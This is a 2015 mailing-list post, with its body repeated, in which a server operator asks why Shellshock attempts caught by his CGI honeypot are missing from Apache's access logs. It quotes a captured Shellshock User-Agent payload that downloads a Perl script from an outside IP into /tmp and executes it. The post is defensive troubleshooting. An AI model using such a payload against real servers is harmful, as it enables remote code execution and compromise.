Markus R. Keßler
2015-02-16 20:15:59 UTC
Hi everybody,
we are under contract with hoster running Apache 1.3.42 on top of
debian.
When shell shock attacks got popular in October, our so-called "admin"
tried to bugfix his shell. Unfortunately, when trying to patch this
ancient bash 2.05b, he messed something up and from then on, for
instance, CTRL-L (clear screen) doesn't work any more.
But maybe, there's more damage than known.
Now I have to see, that some attacking attempts based on the shell shock
bug, are recorded by a "honey pot" which I once installed.
These are perl scripts within the cgi-bin directory of a virtual server,
which have widely known names like "mail.cgi", but in reality they
collect all environment variables and write them into a logfile,
together with the data the attacker has sent.
In the "honey pot" logfile I see requests like
HTTP_USER_AGENT = () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("rm -rf /tmp/l.pl*;wget http://87.106.189.34/ou.pl -O /tmp/l.pl;curl -O /tmp/l.pl http://87.106.189.34/ou.pl;perl /tmp/l.pl;rm -rf l.pl**");'
but in the apache logs (access_log*) there's no such entry, not even a
grep for the attacker's IP gives me some result.
In my understanding, when such a request is passed to a certain cgi
script, this should be also visible in apache's logs?
Can anyone please give me a hint where to look for this misbehaviour?
Maybe there's just a known configuration issue, so that those requests
are not logged under certain circumstances?
Thanks in advance.
Best regards,
Markus
we are under contract with hoster running Apache 1.3.42 on top of
debian.
When shell shock attacks got popular in October, our so-called "admin"
tried to bugfix his shell. Unfortunately, when trying to patch this
ancient bash 2.05b, he messed something up and from then on, for
instance, CTRL-L (clear screen) doesn't work any more.
But maybe, there's more damage than known.
Now I have to see, that some attacking attempts based on the shell shock
bug, are recorded by a "honey pot" which I once installed.
These are perl scripts within the cgi-bin directory of a virtual server,
which have widely known names like "mail.cgi", but in reality they
collect all environment variables and write them into a logfile,
together with the data the attacker has sent.
In the "honey pot" logfile I see requests like
HTTP_USER_AGENT = () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("rm -rf /tmp/l.pl*;wget http://87.106.189.34/ou.pl -O /tmp/l.pl;curl -O /tmp/l.pl http://87.106.189.34/ou.pl;perl /tmp/l.pl;rm -rf l.pl**");'
but in the apache logs (access_log*) there's no such entry, not even a
grep for the attacker's IP gives me some result.
In my understanding, when such a request is passed to a certain cgi
script, this should be also visible in apache's logs?
Can anyone please give me a hint where to look for this misbehaviour?
Maybe there's just a known configuration issue, so that those requests
are not logged under certain circumstances?
Thanks in advance.
Best regards,
Markus
--
Please reply to group only.
For private email please use http://www.dipl-ing-kessler.de/email.htm
Please reply to group only.
For private email please use http://www.dipl-ing-kessler.de/email.htm